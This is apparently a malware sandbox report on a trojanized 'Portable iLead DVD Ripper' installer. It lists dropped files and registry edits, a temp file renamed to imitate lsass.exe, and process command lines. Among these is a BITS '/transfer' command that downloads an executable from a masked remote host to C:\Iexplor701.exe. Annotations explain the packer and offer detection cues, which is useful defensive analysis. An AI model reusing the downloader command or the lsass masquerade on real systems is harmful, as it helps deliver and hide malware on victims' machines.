Technical Information
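- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce] 'wextract_cleanup0' = 'rundll32.exe <SYSTEM32>\advpack.dll,DelNodeRunDLL32 "%TEMP%\IXP000.TMP\"'
  (Note: 'wextract_cleanup0' is the cleanup value that an IExpress/wextract self-extracting package registers to delete its IXP000.TMP extraction folder at the next logon. It identifies the sample's outer packer; it is not, by itself, a persistence entry for the payload.)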
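- [<HKLM>\SYSTEM\ControlSet001\Services\BITS] 'Start' = '00000002'
  (Note: Start = 2 sets the Background Intelligent Transfer Service to start automatically. Read this together with the 'start bits' commands and the '/transfer' command line in the process list further down.)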
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar_right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar_middle.png
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar_left.png
- %WINDIR%\Temp\skins\ilead dvd ripper\top.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_background.png
- %WINDIR%\Temp\skins\ilead dvd ripper\VCD,DVD.png
- %WINDIR%\Temp\skins\ilead dvd ripper\vback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\titlebar.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\stopbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Stop3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\skin.xml
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonbig.png
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonbig11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\textbuttonbig1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_backgroundfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomRight11.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomRight1.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomLeft22.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_Top.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\Zune.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Xbox.png
- %WINDIR%\Temp\skins\ilead dvd ripper\word2.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomLeft11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\vthum1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_slider_over.png
- %WINDIR%\Temp\skins\ilead dvd ripper\volume_slider_normal.png
- %WINDIR%\Temp\skins\ilead dvd ripper\window_main11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomCenter .png
- %WINDIR%\Temp\skins\ilead dvd ripper\WindowBackground_BottomCenter1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\window_main.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playprocessbackfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playprocessback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playerbarright.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Portable devices.png
- %WINDIR%\Temp\skins\ilead dvd ripper\progress.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\product.png
- %WINDIR%\Temp\skins\ilead dvd ripper\previousbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playerbarleft.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_slider_normal.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_backgroundfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_background.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_slider_over.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playerbarback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\playbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\play_slider_pressed.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Property3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\rip_Property.png
- %WINDIR%\Temp\skins\ilead dvd ripper\rip_Delete.png
- %WINDIR%\Temp\skins\ilead dvd ripper\rip_Convert.png
- %WINDIR%\Temp\skins\ilead dvd ripper\scrollbar_bg.png
- %WINDIR%\Temp\skins\ilead dvd ripper\settings.png
- %WINDIR%\Temp\skins\ilead dvd ripper\seperator.png
- %WINDIR%\Temp\skins\ilead dvd ripper\scrollbararrow.png
- %WINDIR%\Temp\skins\ilead dvd ripper\right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\record.png
- %WINDIR%\Temp\skins\ilead dvd ripper\record2.png
- %WINDIR%\Temp\skins\ilead dvd ripper\PSP,PS3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\refresh11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Restore.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Resent.png
- %WINDIR%\Temp\skins\ilead dvd ripper\refresh.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\headerspan.png
- %WINDIR%\Temp\skins\ilead dvd ripper\headerend.png
- %WINDIR%\Temp\skins\ilead dvd ripper\hback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\headerstart.png
- %WINDIR%\Temp\skins\ilead dvd ripper\iPhone.png
- %WINDIR%\Temp\skins\ilead dvd ripper\hthum1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\home.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\FrameActive.png
- %WINDIR%\Temp\skins\ilead dvd ripper\down.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Delete3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\crop.png
- %WINDIR%\Temp\skins\ilead dvd ripper\dvd.png
- %WINDIR%\Temp\skins\ilead dvd ripper\FrameActive1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\forward.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\editback.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\iPod.png
- %WINDIR%\Temp\skins\ilead dvd ripper\max.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainwindow3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainwindow2.png
- %WINDIR%\Temp\skins\ilead dvd ripper\menuback.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\Min.png
- %WINDIR%\Temp\skins\ilead dvd ripper\middle.png
- %WINDIR%\Temp\skins\ilead dvd ripper\menuselect.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainicon.png
- %WINDIR%\Temp\skins\ilead dvd ripper\list_right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\leftbar.png
- %WINDIR%\Temp\skins\ilead dvd ripper\left.png
- %WINDIR%\Temp\skins\ilead dvd ripper\listprogress.png
- %WINDIR%\Temp\skins\ilead dvd ripper\mainbutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\loading.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\listprogressfull.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_left1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\bottom.png
- %WINDIR%\Temp\skins\ilead dvd ripper\back.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_left11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_middle11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_middle1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_left.png
- %WINDIR%\Temp\skins\ilead dvd ripper\audiobutton.png
- %WINDIR%\Temp\skins\ilead dvd ripper\777.png
- %WINDIR%\Temp\skins\ilead dvd ripper\5-0.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\4-1.gif
- %WINDIR%\Temp\skins\ilead dvd ripper\adback.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Audio.png
- %WINDIR%\Temp\skins\ilead dvd ripper\add.png
- %WINDIR%\Temp\skins\ilead dvd ripper\add3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_middle.png
- %WINDIR%\Temp\skins\ilead dvd ripper\combobox.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Close.png
- %WINDIR%\Temp\skins\ilead dvd ripper\close1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\controlpanel.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\copy to ipod.png
- %WINDIR%\Temp\skins\ilead dvd ripper\copy from ipod.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Convert3.png
- %WINDIR%\Temp\skins\ilead dvd ripper\checkradio.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_right.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_right1.png
- %WINDIR%\Temp\skins\ilead dvd ripper\buttom_righ11.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Capacity_Free.png
- %WINDIR%\Temp\skins\ilead dvd ripper\checkbox.png
- %WINDIR%\Temp\skins\ilead dvd ripper\cc.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Capacity_Used.png
- %WINDIR%\Temp\skins\ilead dvd ripper\pause.png
- %WINDIR%\Temp\RarSFX1\language\Spanish.ini
- %WINDIR%\Temp\RarSFX1\language\Russian.ini
- %WINDIR%\Temp\RarSFX1\language\Language.ini
- %WINDIR%\Temp\RarSFX1\profile\3GP - 3GP video(.3gp).pf
- %WINDIR%\Temp\RarSFX1\profile\Apple TV H.264 movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\Apple TV MPEG-4 Movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\AAC - AAC Audio (.aac).pf
- %WINDIR%\Temp\RarSFX1\language\Japanese.ini
- %WINDIR%\Temp\RarSFX1\language\Chinese_simplified.ini
- %WINDIR%\Temp\RarSFX1\CodecSet\XviD MPEG-4 Codec.pass2
- %WINDIR%\Temp\RarSFX1\CodecSet\XviD MPEG-4 Codec.pass1
- %WINDIR%\Temp\RarSFX1\language\Dutch.ini
- %WINDIR%\Temp\RarSFX1\language\Hungarian.ini
- %WINDIR%\Temp\RarSFX1\language\French.ini
- %WINDIR%\Temp\RarSFX1\language\English.ini
- %WINDIR%\Temp\RarSFX1\profile\Archos H264 Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\General MPEG1 format(.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\FLV Video (.FLV).pf
- %WINDIR%\Temp\RarSFX1\profile\DVD raw audio(AC3,DTS).pf
- %WINDIR%\Temp\RarSFX1\profile\General MPEG2 format(.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\HP iPAQ series (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\group.ini
- %WINDIR%\Temp\RarSFX1\profile\General Pocket PC video (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\DivX Movie - DivX + MP3 + DVD resolution (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry AMR Audio(.AMR).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry 3GP Video(.3GP).pf
- %WINDIR%\Temp\RarSFX1\profile\Archos Players series (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry AVI Video(.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\Disney Mix Max player Video - Windows Media Format (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\Creative Zen series (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\BlackBerry MPEG4 Video(.mp4).pf
- <SYSTEM32>\xvid.ax
- <SYSTEM32>\PropList.ocx
- <SYSTEM32>\ac3filter.ax
- <SYSTEM32>\xvidcore.dll
- %WINDIR%\Temp\RarSFX1\updateconfigure.ini
- %WINDIR%\Temp\RarSFX1\T_language.dll
- <SYSTEM32>\xvidvfw.dll
- %WINDIR%\Temp\RarSFX0\ileaddvdripper.exe
- %TEMP%\IXP000.TMP\r.bat
- %TEMP%\IXP000.TMP\w.bat
- %TEMP%\IXP000.TMP\lsass
- %TEMP%\IXP000.TMP\Portable iLead DVD Ripper Platinum 4.0.5.exe
- %WINDIR%\Temp\RarSFX0\sys.exe
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\RarSFX1\ileaddvd.dll
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (2 Logical CPUs).pass2
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (2 Logical CPUs).pass1
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (2 Logical CPUs).cfg
- %WINDIR%\Temp\RarSFX1\CodecSet\x264 - H264_AVC encoder.cfg
- %WINDIR%\Temp\RarSFX1\CodecSet\XviD MPEG-4 Codec.cfg
- %WINDIR%\Temp\RarSFX1\CodecSet\x264 - H264_AVC encoder.pass2
- %WINDIR%\Temp\RarSFX1\CodecSet\x264 - H264_AVC encoder.pass1
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (1 Logical CPU).pass2
- %WINDIR%\Temp\RarSFX1\version.ini
- %WINDIR%\Temp\RarSFX1\ildvdripper.exe
- %WINDIR%\Temp\RarSFX1\idvdcore.dll
- %WINDIR%\Temp\RarSFX1\register.ini
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (1 Logical CPU).pass1
- %WINDIR%\Temp\RarSFX1\CodecSet\DivX_ 6.8 Codec (1 Logical CPU).cfg
- %WINDIR%\Temp\RarSFX1\Settings.ini
- %WINDIR%\Temp\RarSFX1\ileadlicense.txt
- %WINDIR%\Temp\RarSFX1\register.dll
- %WINDIR%\Temp\RarSFX1\link.ini
- %WINDIR%\Temp\RarSFX1\pthreadGC2.dll
- %WINDIR%\Temp\RarSFX1\swscale.dll
- %WINDIR%\Temp\RarSFX1\buynow.url
- %WINDIR%\Temp\RarSFX1\DVDparser.dll
- %WINDIR%\Temp\RarSFX1\getdvdinfo.dll
- %WINDIR%\Temp\RarSFX1\profile\Zune Video - Windows Media Format (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\Zune Video - MPEG-4 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\Zune Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\skins\ilead dvd ripper.skn
- %WINDIR%\Temp\RarSFX1\id3lib.dll
- %WINDIR%\Temp\RarSFX1\base32Dll.dll
- %WINDIR%\Temp\RarSFX1\nLame.dll
- %WINDIR%\Temp\RarSFX1\avutil.dll
- %WINDIR%\Temp\skins\ilead dvd ripper\option.PNG
- %WINDIR%\Temp\skins\ilead dvd ripper\nextbutton.png
- %WINDIR%\Temp\RarSFX1\avformat.dll
- %WINDIR%\Temp\skins\ilead dvd ripper\Others.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Pane_Y.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Pane_X.png
- %WINDIR%\Temp\skins\ilead dvd ripper\Pane_middle.png
- %WINDIR%\Temp\RarSFX1\avcodec.dll
- %WINDIR%\Temp\RarSFX1\RealEncoderDll.dll
- %WINDIR%\Temp\RarSFX1\profileDll.dll
- %WINDIR%\Temp\RarSFX1\homepage.url
- %WINDIR%\Temp\RarSFX1\WmvCodecDll.dll
- %WINDIR%\Temp\RarSFX1\AviCodecDll.dll
- %WINDIR%\Temp\RarSFX1\XEncoder.dll
- %WINDIR%\Temp\RarSFX1\UnzipSkinDll.dll
- %WINDIR%\Temp\RarSFX1\profile\NTSC-SVCD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\NTSC DVD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\MP3 - MPEG Layer-3 Audio (.mp3).pf
- %WINDIR%\Temp\RarSFX1\profile\NTSC-VCD - MPEG1 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\PAL-VCD - MPEG1 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\PAL-SVCD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\PAL DVD - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\MOV - Apple QuickTime(.mov).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Classic MPEG-4 Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPhone (480x320) MPEG-4 Movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPhone (480x320) H.264 Movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Classic H.264(AVC) Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\M4A - M4A Audio (.m4a).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Video nano movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\iPod Touch movie(.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\PS3 Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\WMA - Windows Media Audio (.wma).pf
- %WINDIR%\Temp\RarSFX1\profile\Wii MJPEG Video (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\Wii FLV Video (.FLV).pf
- %WINDIR%\Temp\RarSFX1\profile\WMVTemplate.prx
- %WINDIR%\Temp\RarSFX1\profile\Xbox360 Video - Windows Media Format (.wmv).pf
- %WINDIR%\Temp\RarSFX1\profile\Xbox360 Video - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\Xbox360 Video - H264 (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\Wide Screen Zen Vision W(.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\PSP - PSP MPEG-4 Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\PSP - PSP AVC Movie (.mp4).pf
- %WINDIR%\Temp\RarSFX1\profile\PS3 Video - MPEG2 (.mpg).pf
- %WINDIR%\Temp\RarSFX1\profile\Real Media format - (.rm,rmvb).pf
- %WINDIR%\Temp\RarSFX1\profile\WAV - WAV format (.wav).pf
- %WINDIR%\Temp\RarSFX1\profile\VFW codec (Divx,Xvid etc) - (.avi).pf
- %WINDIR%\Temp\RarSFX1\profile\temp.prx
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
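- Moved/renamed: from %TEMP%\IXP000.TMP\lsass to %TEMP%\IXP000.TMP\lsass.exe
  (Note: the new name imitates the Windows system process lsass.exe, whose genuine image resides in <SYSTEM32>. A process named lsass.exe running from a temp directory is a strong detection signal.)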
- ClassName: 'EDIT' WindowName: ''
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-b60.b64.380001'
- '%WINDIR%\Temp\RarSFX1\ildvdripper.exe'
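- '%TEMP%\IXP000.TMP\lsass.exe' /transfer jman /download /priority high http://bi####r.fileave.com/IC/zhvntnlgecngmdn.exe "C:\Iexplor701.exe"
  (Note: the arguments follow the bitsadmin.exe syntax "/transfer JOBNAME /download /priority LEVEL REMOTE-URL LOCAL-FILE", so the renamed 'lsass.exe' is presumably a copy of a BITS command-line client. The job 'jman' retrieves a further executable to C:\Iexplor701.exe. The '####' in the host name appears to be masking applied by the report, not part of the URL. For detection, look for BITS jobs created by a binary outside <SYSTEM32>, for 'net start bits' issued from an installer's process tree, and for executables written to the root of C:\.)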
- '%WINDIR%\Temp\RarSFX0\ileaddvdripper.exe'
- '%TEMP%\IXP000.TMP\Portable iLead DVD Ripper Platinum 4.0.5.exe'
- '%WINDIR%\Temp\RarSFX0\sys.exe'
- '<SYSTEM32>\net.exe' start bits
- '<SYSTEM32>\net1.exe' start bits
- '<SYSTEM32>\ntvdm.exe' -f -i1
- '<SYSTEM32>\cmd.exe' /C r.bat